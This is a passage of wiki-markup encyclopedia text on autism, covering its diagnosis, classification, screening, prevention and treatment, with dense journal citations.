Enhanced perceptual functioning in autism: an update, and eight principles of autistic perception | journal = J Autism Dev Disord | volume = 36 | issue = 1 | pages = 27–43 | year = 2006 | pmid = 16453071 | doi = 10.1007/s10803-005-0040-7 }}</ref> These theories map well from the underconnectivity theory of autism. Neither category is satisfactory on its own; social cognition theories poorly address autism's rigid and repetitive behaviors, while the nonsocial theories have difficulty explaining social impairment and communication difficulties.<ref name="HappeTime">{{cite journal | vauthors = Happé F, Ronald A, Plomin R | title = Time to give up on a single explanation for autism | journal = Nature Neuroscience | volume = 9 | issue = 10 | pages = 1218–20 | year = 2006 | pmid = 17001340 | doi = 10.1038/nn1770 }}</ref> A combined theory based on multiple deficits may prove to be more useful.<ref>{{cite journal | journal = Dev Rev | year = 2007 | volume = 27 | issue = 2 | pages = 224–60 | title = Cognitive theories of autism | vauthors = Rajendran G, Mitchell P | doi = 10.1016/j.dr.2007.02.001 }}</ref> ==Diagnosis== [[Medical diagnosis|Diagnosis]] is based on behavior, not cause or mechanism.<ref name="London">{{cite journal | vauthors = London E | title = The role of the neurobiologist in redefining the diagnosis of autism | journal = Brain Pathol | volume = 17 | issue = 4 | pages = 408–11 | year = 2007 | pmid = 17919126 | doi = 10.1111/j.1750-3639.2007.00103.x }}</ref><ref>{{cite journal | vauthors = Baird G, Cass H, Slonims V | title = Diagnosis of autism | journal = BMJ | volume = 327 | issue = 7413 | pages = 488–93 | year = 2003 | pmid = 12946972 | pmc = 188387 | doi = 10.1136/bmj.327.7413.488 | url = http://www.bmj.com/cgi/content/full/327/7413/488 | archiveurl = http://web.archive.org/web/20090306153446/http://www.bmj.com:80/cgi/content/full/327/7413/488 | archivedate = 6 March 2009 }}</ref> Under the [[DSM-5]], autism is characterized by persistent deficits in social communication and interaction across multiple contexts, as well as restricted, repetitive patterns of behavior, interests, or activities. These deficits are present in early childhood, typically before age three, and lead to clinically significant functional impairment. Sample symptoms include lack of social or emotional reciprocity, stereotyped and repetitive use of language or [[Idiosyncrasy#Psychiatry and psychology|idiosyncratic language]], and persistent preoccupation with unusual objects. The disturbance must not be better accounted for by [[Rett syndrome]], [[intellectual disability]] or global developmental delay.<ref name=DSM5/> [[ICD-10]] uses essentially the same definition.<ref name="ICD-10-F84.0">{{cite web|url=http://apps.who.int/classifications/apps/icd/icd10online/?gf80.htm+f84 |year=2007 |accessdate=10 October 2009|work=ICD-10: International Statistical Classification of Diseases and Related Health Problems: Tenth Revision|publisher=World Health Organization |title=F84. Pervasive developmental disorders |archiveurl=http://web.archive.org/web/20130421042448/http://apps.who.int:80/classifications/apps/icd/icd10online/?gf80.htm+f84|archivedate=21 April 2013}}</ref> Several diagnostic instruments are available. Two are commonly used in autism research: the [[Autism Diagnostic Interview-Revised]] (ADI-R) is a semistructured parent interview, and the [[Autism Diagnostic Observation Schedule]] (ADOS)<ref>{{cite journal | vauthors = Gotham K, Risi S, Dawson G, Tager-Flusberg H, Joseph R, Carter A, Hepburn S, McMahon W, Rodier P, Hyman SL, Sigman M, Rogers S, Landa R, Spence MA, Osann K, Flodman P, Volkmar F, Hollander E, Buxbaum J, Pickles A, Lord C | title = A replication of the Autism Diagnostic Observation Schedule (ADOS) revised algorithms | journal = J Am Acad Child Adolesc Psychiatry | volume = 47 | issue = 6 | pages = 642–51 | year = 2008 | pmid = 18434924 | pmc = 3057666 | doi = 10.1097/CHI.0b013e31816bffb7 }}</ref> uses observation and interaction with the child. The [[Childhood Autism Rating Scale]] (CARS) is used widely in clinical environments to assess severity of autism based on observation of children.<ref name=Volkmar/> A [[pediatrician]] commonly performs a preliminary investigation by taking developmental history and physically examining the child. If warranted, diagnosis and evaluations are conducted with help from ASD specialists, observing and assessing cognitive, communication, family, and other factors using standardized tools, and taking into account any associated [[medical conditions]].<ref name=Dover/> A pediatric [[neuropsychologist]] is often asked to assess behavior and cognitive skills, both to aid diagnosis and to help recommend educational interventions.<ref name="Kanne">{{cite journal | vauthors = Kanne SM, Randolph JK, Farmer JE | title = Diagnostic and assessment findings: a bridge to academic planning for children with autism spectrum disorders | journal = Neuropsychol Rev | volume = 18 | issue = 4 | pages = 367–84 | year = 2008 | pmid = 18855144 | doi = 10.1007/s11065-008-9072-z }}</ref> A [[differential diagnosis]] for ASD at this stage might also consider [[intellectual disability]], [[hearing impairment]], and a [[specific language impairment]]<ref name=Dover/> such as [[Landau–Kleffner syndrome]].<ref>{{cite journal | vauthors = Mantovani JF | title = Autistic regression and Landau–Kleffner syndrome: progress or confusion? | journal = Dev Med Child Neurol | volume = 42 | issue = 5 | pages = 349–53 | year = 2000 | pmid = 10855658 | doi = 10.1017/S0012162200210621 | title. = }}</ref> The presence of autism can make it harder to diagnose coexisting psychiatric disorders such as [[Major depressive disorder|depression]].<ref>{{cite journal | vauthors = Matson JL, Neal D | title = Cormorbidity: diagnosing comorbid psychiatric conditions | journal = Psychiatr Times | volume = 26 |issue=4 |year=2009|url=http://www.psychiatrictimes.com/display/article/10168/1403043 | archiveurl = http://web.archive.org/web/20130403062215/http://www.psychiatrictimes.com/display/article/10168/1403043 | archivedate = 3 April 2013 }}</ref> [[Clinical genetics]] evaluations are often done once ASD is diagnosed, particularly when other symptoms already suggest a genetic cause.<ref name=Caronna/> Although genetic technology allows clinical geneticists to link an estimated 40% of cases to genetic causes,<ref>{{cite journal | vauthors = Schaefer GB, Mendelsohn NJ | title = Genetics evaluation for the etiologic diagnosis of autism spectrum disorders | journal = Genet Med | volume = 10 | issue = 1 | pages = 4–12 | year = 2008 | pmid = 18197051 | doi = 10.1097/GIM.0b013e31815efdd7 | laysummary = http://www.medicalnewstoday.com/articles/96448.php | laydate = 7 February 2008 | laysource = Medical News Today }} {{Wayback|df=yes|url=http://www.medicalnewstoday.com/articles/96448.php|date =20100901151333}}</ref> consensus guidelines in the US and UK are limited to high-resolution chromosome and [[fragile X]] testing.<ref name=Caronna/> A [[Genotype-first approach|genotype-first]] model of diagnosis has been proposed, which would routinely assess the genome's copy number variations.<ref>{{cite journal | vauthors = Ledbetter DH | title = Cytogenetic technology—genotype and phenotype | journal = N Engl J Med | volume = 359 | issue = 16 | pages = 1728–30 | year = 2008 | pmid = 18784093 | doi = 10.1056/NEJMe0806570 }}</ref> As new genetic tests are developed several ethical, legal, and social issues will emerge. Commercial availability of tests may precede adequate understanding of how to use test results, given the complexity of autism's genetics.<ref>{{cite journal | vauthors = McMahon WM, Baty BJ, Botkin J | title = Genetic counseling and ethical issues for autism | journal = American Journal of Medical Genetics | volume = 142C | issue = 1 | pages = 52–7 | year = 2006 | pmid = 16419100 | doi = 10.1002/ajmg.c.30082 }}</ref> [[Metabolic]] and [[neuroimaging]] tests are sometimes helpful, but are not routine.<ref name=Caronna/> ASD can sometimes be diagnosed by age 14 months, although diagnosis becomes increasingly stable over the first three years of life: for example, a one-year-old who meets diagnostic criteria for ASD is less likely than a three-year-old to continue to do so a few years later.<ref name="Landa3">{{cite journal | vauthors = Landa RJ | title = Diagnosis of autism spectrum disorders in the first 3 years of life | journal = Nat Clin Pract Neurol | volume = 4 | issue = 3 | pages = 138–47 | year = 2008 | pmid = 18253102 | doi = 10.1038/ncpneuro0731 }}</ref> In the UK the National Autism Plan for Children recommends at most 30 weeks from first concern to completed diagnosis and assessment, though few cases are handled that quickly in practice.<ref name="Dover">{{cite journal | vauthors = Dover CJ, Le Couteur A | title = How to diagnose autism | journal = Arch Dis Child | volume = 92 | issue = 6 | pages = 540–5 | year = 2007 | pmid = 17515625 | doi = 10.1136/adc.2005.086280 }}</ref> Although the symptoms of autism and ASD begin early in childhood, they are sometimes missed; years later, adults may seek diagnoses to help them or their friends and family understand themselves, to help their employers make adjustments, or in some locations to claim disability living allowances or other benefits. Underdiagnosis and overdiagnosis are problems in marginal cases, and much of the recent increase in the number of reported ASD cases is likely due to changes in diagnostic practices. The increasing popularity of drug treatment options and the expansion of benefits has given providers incentives to diagnose ASD, resulting in some overdiagnosis of children with uncertain symptoms. Conversely, the cost of screening and diagnosis and the challenge of obtaining payment can inhibit or delay diagnosis.<ref>{{cite journal | vauthors = Shattuck PT, Grosse SD | title = Issues related to the diagnosis and treatment of autism spectrum disorders | journal = Ment Retard Dev Disabil Res Rev | volume = 13 | issue = 2 | pages = 129–35 | year = 2007 | pmid = 17563895 | doi = 10.1002/mrdd.20143 }}</ref> It is particularly hard to diagnose autism among the [[visually impaired]], partly because some of its diagnostic criteria depend on vision, and partly because autistic symptoms overlap with those of common blindness syndromes or [[blindism]]s.<ref>{{cite journal | title = Visual impairment and autism: current questions and future research | vauthors = Cass H |journal=Autism |year=1998 |volume=2 |issue=2 |pages=117–38|doi=10.1177/1362361398022002 }}</ref> ===Classification=== Autism is one of the five [[pervasive developmental disorder]]s (PDD), which are characterized by widespread abnormalities of social interactions and communication, and severely restricted interests and highly repetitive behavior.<ref name=ICD-10-F84.0/> These symptoms do not imply sickness, fragility, or emotional disturbance.<ref name=Rapin/> Of the five PDD forms, [[Asperger syndrome]] is closest to autism in signs and likely causes; [[Rett syndrome]] and [[childhood disintegrative disorder]] share several signs with autism, but may have unrelated causes; [[PDD not otherwise specified]] (PDD-NOS; also called ''atypical autism'') is diagnosed when the criteria are not met for a more specific disorder.<ref>{{cite journal | vauthors = Volkmar FR, State M, Klin A | title = Autism and autism spectrum disorders: diagnostic issues for the coming decade | journal = J Child Psychol Psychiatry | volume = 50 | issue = 1–2 | pages = 108–15 | year = 2009 | pmid = 19220594 | doi = 10.1111/j.1469-7610.2008.02010.x }}</ref> Unlike with autism, people with Asperger syndrome have no substantial delay in [[language development]].<ref name="DSM-IV-TR-299.00">{{vcite book |author=American Psychiatric Association |title=Diagnostic and statistical manual of mental disorders: DSM-IV |chapter=Diagnostic criteria for 299.00 Autistic Disorder |publisher=American Psychiatric Association |edition=4 |location=Washington, DC|year=2000 |pages= |isbn=978-0-89042-025-6 |oclc=768475353 |url=http://cdc.gov/ncbddd/autism/hcp-dsm.html |accessdate=|archiveurl=http://web.archive.org/web/20131029080544/http://www.cdc.gov:80/ncbddd/autism/hcp-dsm.html |archivedate=29 October 2013 }}</ref> The terminology of autism can be bewildering, with autism, Asperger syndrome and PDD-NOS often called the ''autism spectrum disorders'' (ASD)<ref name=CCD/> or sometimes the ''autistic disorders'',<ref>{{cite journal | vauthors = Freitag CM | title = The genetics of autistic disorders and its clinical relevance: a review of the literature | journal = Mol Psychiatry | volume = 12 | issue = 1 | pages = 2–22 | year = 2007 | pmid = 17033636 | doi = 10.1038/sj.mp.4001896 }}</ref> whereas autism itself is often called ''autistic disorder'', ''childhood autism'', or ''infantile autism''. In this article, ''autism'' refers to the classic autistic disorder; in clinical practice, though, ''autism'', ''ASD'', and ''PDD'' are often used interchangeably.<ref name="Caronna">{{cite journal | vauthors = Caronna EB, Milunsky JM, Tager-Flusberg H | title = Autism spectrum disorders: clinical and research frontiers | journal = Arch Dis Child | volume = 93 | issue = 6 | pages = 518–23 | year = 2008 | pmid = 18305076 | doi = 10.1136/adc.2006.115337 }}</ref> ASD, in turn, is a subset of the broader autism [[phenotype]], which describes individuals who may not have ASD but do have autistic-like [[Trait (biology)|traits]], such as avoiding eye contact.<ref>{{cite journal | vauthors = Piven J, Palmer P, Jacobi D, Childress D, Arndt S | title = Broader autism phenotype: evidence from a family history study of multiple-incidence autism families | journal = Am J Psychiatry | volume = 154 | issue = 2 | pages = 185–90 | year = 1997 | pmid = 9016266 | doi=10.1176/ajp.154.2.185}}</ref> The manifestations of autism cover a wide [[Spectrum disorder|spectrum]], ranging from individuals with severe impairments—who may be silent, [[developmentally disabled]], and locked into hand flapping and rocking—to high functioning individuals who may have active but distinctly odd social approaches, narrowly focused interests, and verbose, [[pedantic]] communication.<ref>{{cite journal | vauthors = Happé F | title = Understanding assets and deficits in autism: why success is more interesting than failure | journal = Psychologist | volume = 12 | issue = 11 | pages = 540–7 | year = 1999 | url = http://www.thepsychologist.org.uk/archive/archive_home.cfm/volumeID_12-editionID_46-ArticleID_133-getfile_getPDF/thepsychologist/psy_11_99_p540-547_happe.pdf | format = PDF | archiveurl = http://web.archive.org/web/20120517162434/http://www.thepsychologist.org.uk/archive/archive_home.cfm/volumeID_12-editionID_46-ArticleID_133-getfile_getPDF/thepsychologist/psy_11_99_p540-547_happe.pdf |archivedate=17 May 2012 }}</ref> Because the behavior spectrum is continuous, boundaries between diagnostic categories are necessarily somewhat arbitrary.<ref name=Geschwind-2009/> Sometimes the syndrome is divided into low-, medium- or [[high-functioning autism]] (LFA, MFA, and HFA), based on [[IQ]] thresholds,<ref>{{cite journal | vauthors = Baron-Cohen S | title = The hyper-systemizing, assortative mating theory of autism | journal = Prog Neuropsychopharmacol Biol Psychiatry | volume = 30 | issue = 5 | pages = 865–72 | year = 2006 | pmid = 16519981 | doi = 10.1016/j.pnpbp.2006.01.010 | url = http://autismresearchcentre.com/docs/papers/2006_BC_Neuropsychophamacology.pdf | format = PDF | archiveurl = http://web.archive.org/web/20120513020615/http://autismresearchcentre.com/docs/papers/2006_BC_Neuropsychophamacology.pdf | archivedate = 12 May 2012 }}</ref> or on how much support the individual requires in daily life; these subdivisions are not standardized and are controversial. Autism can also be divided into [[Syndrome|syndromal]] and non-syndromal autism; the syndromal autism is associated with severe or profound [[intellectual disability]] or a congenital syndrome with physical symptoms, such as [[tuberous sclerosis]].<ref>{{cite journal | vauthors = Cohen D, Pichard N, Tordjman S, Baumann C, Burglen L, Excoffier E, Lazar G, Mazet P, Pinquier C, Verloes A, Héron D | title = Specific genetic disorders and autism: clinical contribution towards their identification | journal = J Autism Dev Disord | volume = 35 | issue = 1 | pages = 103–16 | year = 2005 | pmid = 15796126 | doi = 10.1007/s10803-004-1038-2 | author. = }}</ref> Although individuals with Asperger syndrome tend to perform better cognitively than those with autism, the extent of the [[Diagnosis of Asperger syndrome#Differences from high-functioning autism|overlap between Asperger syndrome, HFA, and non-syndromal autism]] is unclear.<ref>Validity of ASD subtypes: * {{cite journal | vauthors = Klin A | title = Autism and Asperger syndrome: an overview | journal = Rev Bras Psiquiatr | volume = 28 | issue = suppl 1 | pages = S3–S11 | year = 2006 | pmid = 16791390 | doi = 10.1590/S1516-44462006000500002 | url = http://www.scielo.br/scielo.php?script=sci_arttext&pid=S1516-44462006000500002&lng=en&nrm=iso&tlng=en | archiveurl = http://web.archive.org/web/20131029185542/http://www.scielo.br/scielo.php?script=sci_arttext&pid=S1516-44462006000500002&lng=en&nrm=iso&tlng=en | archivedate = 29 October 2013 }} * {{cite journal | vauthors = Witwer AN, Lecavalier L | title = Examining the validity of autism spectrum disorder subtypes | journal = J Autism Dev Disord | volume = 38 | issue = 9 | pages = 1611–24 | year = 2008 | pmid = 18327636 | doi = 10.1007/s10803-008-0541-2 }}</ref> Some studies have reported diagnoses of autism in children due to a loss of language or social skills, as opposed to a failure to make progress, typically from 15 to 30 months of age. The validity of this distinction remains controversial; it is possible that [[regressive autism]] is a specific subtype,<ref name="Stefanatos">{{cite journal | vauthors = Stefanatos GA | title = Regression in autistic spectrum disorders | journal = Neuropsychol Rev | volume = 18 | issue = 4 | pages = 305–19 | year = 2008 | pmid = 18956241 | doi = 10.1007/s11065-008-9073-y }}</ref><ref name="Volkmar">{{cite journal | vauthors = Volkmar F, Chawarska K, Klin A | title = Autism in infancy and early childhood | journal = Annu Rev Psychol | volume = 56 | pages = 315–36 | year = 2005 | pmid = 15709938 | doi = 10.1146/annurev.psych.56.091103.070159 }} A partial update is in: {{cite journal | vauthors = Volkmar FR, Chawarska K | title = Autism in infants: an update | journal = World Psychiatry | volume = 7 | issue = 1 | pages = 19–21 | year = 2008 | pmid = 18458791 | pmc = 2366821 }}</ref><ref name=Landa/><ref name=Landa3/> or that there is a continuum of behaviors between autism with and without regression.<ref>{{cite journal | vauthors = Ozonoff S, Heung K, Byrd R, Hansen R, Hertz-Picciotto I | title = The onset of autism: patterns of symptom emergence in the first years of life | journal = Autism Res | volume = 1 | issue = 6 | pages = 320–328 | year = 2008 | pmid = 19360687 | pmc = 2857525 | doi = 10.1002/aur.53 }}</ref> Research into causes has been hampered by the inability to identify biologically meaningful subgroups within the autistic population<ref>{{cite journal | vauthors = Altevogt BM, Hanson SL, Leshner AI | title = Autism and the environment: challenges and opportunities for research | journal = Pediatrics | volume = 121 | issue = 6 | pages = 1225–9 | year = 2008 | pmid = 18519493 | doi = 10.1542/peds.2007-3000 | url = http://pediatrics.aappublications.org/cgi/content/full/121/6/1225 | archiveurl = http://web.archive.org/web/20100115140620/http://pediatrics.aappublications.org:80/cgi/content/full/121/6/1225 | archivedate = 15 January 2010 }}</ref> and by the traditional boundaries between the disciplines of [[psychiatry]], [[psychology]], [[neurology]] and [[pediatrics]].<ref>{{cite journal | vauthors = Reiss AL | title = Childhood developmental disorders: an academic and clinical convergence point for psychiatry, neurology, psychology and pediatrics | journal = J Child Psychol Psychiatry | volume = 50 | issue = 1–2 | pages = 87–98 | year = 2009 | pmid = 19220592 | doi = 10.1111/j.1469-7610.2008.02046.x }}</ref> Newer technologies such as [[fMRI]] and [[diffusion tensor imaging]] can help identify biologically relevant [[phenotype]]s (observable traits) that can be viewed on [[brain scan]]s, to help further [[neurogenetic]] studies of autism;<ref>{{cite journal | vauthors = Piggot J, Shirinyan D, Shemmassian S, Vazirian S, Alarcón M | title = Neural systems approaches to the neurogenetics of autism spectrum disorders | journal = Neuroscience | volume = 164 | issue = 1 | pages = 247–56 | year = 2009 | pmid = 19482063 | doi = 10.1016/j.neuroscience.2009.05.054 }}</ref> one example is lowered activity in the [[fusiform face area]] of the brain, which is associated with impaired perception of people versus objects.<ref name=Levy/> It has been proposed to classify autism using genetics as well as behavior.<ref>{{cite journal | vauthors = Stephan DA | title = Unraveling autism | journal = American Journal of Human Genetics | volume = 82 | issue = 1 | pages = 7–9 | year = 2008 | pmid = 18179879 | pmc = 2253980 | doi = 10.1016/j.ajhg.2007.12.003 }}</ref> ==Screening== About half of parents of children with ASD notice their child's unusual behaviors by age 18 months, and about four-fifths notice by age 24 months.<ref name=Landa3/> According to an article in the ''Journal of Autism and Developmental Disorders'', failure to meet any of the following milestones "is an absolute indication to proceed with further evaluations. Delay in referral for such testing may delay early diagnosis and treatment and affect the long-term outcome".<ref name=Filipek/> * No [[babbling]] by 12 months. * No [[Gesture|gesturing]] (pointing, waving, etc.) by 12 months. * No single words by 16 months. * No two-word (spontaneous, not just [[echolalia|echolalic]]) phrases by 24 months. * Any loss of any language or social skills, at any age. US and Japanese practice is to [[Screening (medicine)|screen]] all children for ASD at 18 and 24 months, using autism-specific formal screening tests. In contrast, in the UK, children whose families or doctors recognize possible signs of autism are screened. It is not known which approach is more effective.<ref name=Levy/> Screening tools include the [[Modified Checklist for Autism in Toddlers]] (M-CHAT), the Early Screening of Autistic Traits Questionnaire, and the First Year Inventory; initial data on [[Modified Checklist for Autism in Toddlers|M-CHAT]] and its predecessor, the [[Checklist for Autism in Toddlers]] (CHAT), on children aged 18–30 months suggests that it is best used in a clinical setting and that it has low [[Sensitivity (tests)|sensitivity]] (many false-negatives) but good [[Specificity (tests)|specificity]] (few false-positives).<ref name=Landa3/> It may be more accurate to precede these tests with a broadband screener that does not distinguish ASD from other developmental disorders.<ref>{{cite journal | vauthors = Wetherby AM, Brosnan-Maddox S, Peace V, Newton L | title = Validation of the Infant–Toddler Checklist as a broadband screener for autism spectrum disorders from 9 to 24 months of age | journal = Autism | volume = 12 | issue = 5 | pages = 487–511 | year = 2008 | pmid = 18805944 | pmc = 2663025 | doi = 10.1177/1362361308094501 }}</ref> Screening tools designed for one culture's norms for behaviors like eye contact may be inappropriate for a different culture.<ref>{{cite journal | vauthors = Wallis KE, Pinto-Martin J | title = The challenge of screening for autism spectrum disorder in a culturally diverse society | journal = Acta Paediatr | volume = 97 | issue = 5 | pages = 539–40 | year = 2008 | pmid = 18373717 | doi = 10.1111/j.1651-2227.2008.00720.x }}</ref> Although [[genetic screening]] for autism is generally still impractical, it can be considered in some cases, such as children with neurological symptoms and [[dysmorphic feature]]s.<ref>{{cite journal | vauthors = Lintas C, Persico AM | title = Autistic phenotypes and genetic testing: state-of-the-art for the clinical geneticist | journal = Journal of Medical Genetics | volume = 46 | issue = 1 | pages = 1–8 | year = 2009 | pmid = 18728070 | pmc = 2603481 | doi = 10.1136/jmg.2008.060871 | url = http://jmg.bmj.com/content/46/1/1.long | archiveurl = http://web.archive.org/web/20131030000423/http://jmg.bmj.com/content/46/1/1.long | archivedate = 30 October 2013 }}</ref> ==Prevention== Infection with [[rubella]] during [[pregnancy]] causes less than 1% of cases of autism;<ref name=Duchan/> [[rubella vaccine|vaccination against rubella]] can prevent many of those cases.<ref name=Lancet2015>{{cite journal|author=Lambert N, Strebel P, Orenstein W, Icenogle J, Poland GA|title=Rubella|journal=Lancet|date=7 January 2015|doi=10.1016/S0140-6736(14)60539-0|pmid=25576992}}</ref> ==Management== {{main|Autism therapies}} [[File:Opening a window to the autistic brain.jpg|thumb|alt=A young child points, in front of a woman who smiles and points in the same direction.|A three-year-old with autism points to fish in an aquarium, as part of an experiment on the effect of intensive shared-attention training on language development.<ref name=Powell/>]] The main goals when treating children with autism are to lessen associated deficits and family distress, and to increase quality of life and functional independence. No single treatment is best and treatment is typically tailored to the child's needs.<ref name=CCD/> Families and the educational system are the main resources for treatment.<ref name=Levy/> Studies of interventions have methodological problems that prevent definitive conclusions about [[efficacy]].<ref>{{cite journal | vauthors = Ospina MB, Krebs Seida J, Clark B, Karkhaneh M, Hartling L, Tjosvold L, Vandermeer B, Smith V | title = Behavioural and developmental interventions for autism spectrum disorder: a clinical systematic review | journal = PLoS ONE | volume = 3 | issue = 11 | pages = e3755 | year = 2008 | pmid = 19015734 | pmc = 2582449 | doi = 10.1371/journal.pone.0003755 | url = http://www.plosone.org/article/info:doi/10.1371/journal.pone.0003755 | author. = | archiveurl = http://web.archive.org/web/20131105071310/http://www.plosone.org/article/info:doi/10.1371/journal.pone.0003755 | archivedate = 5 November 2013 }}</ref> Although many [[psychosocial]] interventions have some positive evidence, suggesting that some form of treatment is preferable to no treatment, the methodological quality of [[systematic review]]s of these studies has generally been poor, their clinical results are mostly tentative, and there is little evidence for the relative effectiveness of treatment options.<ref>{{cite journal | vauthors = Seida JK, Ospina MB, Karkhaneh M, Hartling L, Smith V, Clark B | title = Systematic reviews of psychosocial interventions for autism: an umbrella review | journal = Dev Med Child Neurol | volume = 51 | issue = 2 | pages = 95–104 | year = 2009 | pmid = 19191842 | doi = 10.1111/j.1469-8749.2008.03211.x }}</ref> Intensive, sustained [[special education]] programs and [[behavior therapy]] early in life can help children acquire self-care, social, and job skills,<ref name="CCD">{{cite journal | vauthors = Myers SM, Johnson CP | title = Management of children with autism spectrum disorders | journal = Pediatrics | volume = 120 | issue = 5 | pages = 1162–82 | year = 2007 | pmid = 17967921 | doi = 10.1542/peds.2007-2362 }}</ref> and often improve functioning and decrease symptom severity and maladaptive behaviors;<ref name="Rogers">{{cite journal | vauthors = Rogers SJ, Vismara LA | title = Evidence-based comprehensive treatments for early autism | journal = J Clin Child Adolesc Psychol | volume = 37 | issue = 1 | pages = 8–38 | year = 2008 | pmid = 18444052 | pmc = 2943764 | doi = 10.1080/15374410701817808 }}</ref> claims that intervention by around age three years is crucial are not substantiated.<ref name="HowlinCharman">{{cite journal | vauthors = Howlin P, Magiati I, Charman T | title = Systematic review of early intensive behavioral interventions for children with autism | journal = Am J Intellect Dev Disabil | volume = 114 | issue = 1 | pages = 23–41 | year = 2009 | pmid = 19143460 | doi = 10.1352/2009.114:23-41 }}</ref> Available approaches include [[applied behavior analysis]] (ABA), developmental models, [[TEACCH|structured teaching]], [[speech and language therapy]], [[social skills]] therapy, and [[occupational therapy]].<ref name=CCD/> There is some evidence that early intensive behavioral intervention (EIBI), an early intervention model based on ABA for 20 to 40&nbsp;hours a week for multiple years, is an effective treatment for some children with ASD.<ref>{{cite journal | vauthors = Reichow B, Barton EE, Boyd BA, Hume K | title = Early intensive behavioral intervention (EIBI) for young children with autism spectrum disorders (ASD) | journal = Cochrane Database of Systematic Reviews | volume = 10 | issue = | pages = CD009260 | year = 2012 | pmid = 23076956 | doi = 10.1002/14651858.CD009260.pub2 }}</ref> Educational interventions can be effective to varying degrees in most children: [[Early intensive behavioral intervention|intensive ABA treatment]] has demonstrated effectiveness in enhancing global functioning in preschool children<ref name="Eikeseth">{{cite journal | vauthors = Eikeseth S | title = Outcome of comprehensive psycho-educational interventions for young children with autism | journal = Res Dev Disabil | volume = 30 | issue = 1 | pages = 158–78 | year = 2009 | pmid = 18385012 | doi = 10.1016/j.ridd.2008.02.003 }}</ref> and is well-established for improving intellectual performance of young children.<ref name=Rogers/> Neuropsychological reports are often poorly communicated to educators, resulting in a gap between what a report recommends and what education is provided.<ref name=Kanne/> It is not known whether treatment programs for children lead to significant improvements after the children grow up,<ref name=Rogers/> and the limited research on the effectiveness of adult residential programs shows mixed results.<ref>{{cite journal | vauthors = Van Bourgondien ME, Reichle NC, Schopler E | title = Effects of a model treatment approach on adults with autism | journal = J Autism Dev Disord | volume = 33 | issue = 2 | pages = 131–40 | year = 2003 | pmid = 12757352 | doi = 10.1023/A:1022931224934 }}</ref> The appropriateness of including children with varying severity of autism spectrum disorders in the general education population is a subject of current debate among educators and researchers.<ref>{{cite journal |journal=Topics in Language Disorders |year=2003 |volume=23 |issue=2 |pages=116–133 |title=Inclusion of Learners with Autism Spectrum Disorders in General Education Settings | vauthors = Simpson RL, de Boer-Ott SR, Smith-Myles B|url=http://www.nursingcenter.com/pdf.asp?AID=520301 |doi=10.1097/00011363-200304000-00005}}</ref> Many medications are used to treat ASD symptoms that interfere with integrating a child into home or school when behavioral treatment fails.<ref name=Rapin/><ref>{{cite journal | vauthors = Leskovec TJ, Rowles BM, Findling RL | title = Pharmacological treatment options for autism spectrum disorders in children and adolescents | journal = Harv Rev Psychiatry | volume = 16 | issue = 2 | pages = 97–112 | year = 2008 | pmid = 18415882 | doi = 10.1080/10673220802075852 }}</ref> More than half of US children diagnosed with ASD are prescribed [[psychoactive drug]]s or [[anticonvulsant]]s, with the most common drug classes being [[antidepressant]]s, [[stimulant]]s, and [[antipsychotic]]s.<ref>{{cite journal | vauthors = Oswald DP, Sonenklar NA | title = Medication use among children with autism spectrum disorders | journal = J Child Adolesc Psychopharmacol | volume = 17 | issue = 3 | pages = 348–55 | year = 2007 | pmid = 17630868 | doi = 10.1089/cap.2006.17303 }}</ref> Antipsychotics, such as [[risperidone]] and [[aripiprazole]], have been found to be useful for treating irritability, repetitive behavior, and sleeplessness that often occurs with autism.<ref>{{cite journal | vauthors = Posey DJ, Stigler KA, Erickson CA, McDougle CJ | title = Antipsychotics in the treatment of autism | journal = J Clin Invest | volume = 118 | issue = 1 | pages = 6–14 | year = 2008 | pmid = 18172517 | pmc = 2171144 | doi = 10.1172/JCI32483 | url = http://www.jci.org/articles/view/32483/version/1 | archiveurl = http://web.archive.org/web/20131220104731/http://www.jci.org/articles/view/32483/version/1 | archivedate = 20 December 2013 }}</ref> There is scant reliable research about the effectiveness or safety of drug treatments for adolescents and adults with ASD.<ref>Lack of research on drug treatments: * {{cite journal | vauthors = Angley M, Young R, Ellis D, Chan W, McKinnon R | title = Children and autism—part 1—recognition and pharmacological management | journal = Aust Fam Physician | volume = 36 | issue = 9 | pages = 741–4 | year = 2007 | pmid = 17915375 | url = http://www.racgp.org.au/afp/200709/200709angley.pdf | format = PDF | archiveurl = http://web.archive.org/web/20130407205054/http://www.racgp.org.au/afp/200709/200709angley.pdf | archivedate = 7 April 2013 }} * {{cite journal | vauthors = Broadstock M, Doughty C, Eggleston M | title = Systematic review of the effectiveness of pharmacological treatments for adolescents and adults with autism spectrum disorder | journal = Autism | volume = 11 | issue = 4 | pages = 335–48 | year = 2007 | pmid = 17656398 | doi = 10.1177/1362361307078132 }}</ref> A person with ASD may respond atypically to medications, the medications can have [[Adverse effect (medicine)|adverse effects]],<ref name=CCD/> and no known medication relieves autism's core symptoms of social and communication impairments.<ref>{{cite journal | vauthors = Buitelaar JK | title = Why have drug treatments been so disappointing? | journal = Novartis Found Symp | volume = 251 | pages = 235–44; discussion 245–9, 281–97 | year = 2003 | pmid = 14521196 | doi = 10.1002/0470869380.ch14 | title. = }}</ref> Experiments in mice have reversed or reduced some symptoms related to autism by replacing or modulating gene function,<ref name=Walsh/><ref name="pmid18093519"/> suggesting the possibility of targeting therapies to specific rare mutations known to cause autism.<ref name=Betancur/><ref name="pmid20303363">{{cite journal | vauthors = Dölen G, Carpenter RL, Ocain TD, Bear MF | title = Mechanism-based approaches to treating fragile X | journal = Pharmacol Ther | volume = 127 | issue = 1 | pages = 78–93 | year = 2010 | pmid = 20303363 | doi = 10.1016/j.pharmthera.2010.02.008 }}</ref> Although many [[Alternative therapies for developmental and learning disabilities|alternative therapies and interventions]] are available, few are supported by scientific studies.<ref name=Sigman/><ref>Lack of support for interventions: * {{cite journal | vauthors = Francis K | title = Autism interventions: a critical update | journal = Dev Med Child Neurol | volume = 47 | issue = 7 | pages = 493–9 | year = 2005 | pmid = 15991872 | doi = 10.1017/S0012162205000952 | url = http://journals.cambridge.org/production/action/cjoGetFulltext?fulltextid=313204 | format = PDF }} * {{cite journal | vauthors = Levy SE, Hyman SL | title = Complementary and alternative medicine treatments for children with autism spectrum disorders | journal = Child Adolesc Psychiatr Clin N Am | volume = 17 | issue = 4 | pages = 803–20, ix | year = 2008 | pmid = 18775371 | pmc = 2597185 | doi = 10.1016/j.chc.2008.06.004 }} * {{cite journal | vauthors = Rao PA, Beidel DC, Murray MJ | title = Social skills interventions for children with Asperger's syndrome or high-functioning autism: a review and recommendations | journal = J Autism Dev Disord | volume = 38 | issue = 2 | pages = 353–61 | year = 2008 | pmid = 17641962 | doi = 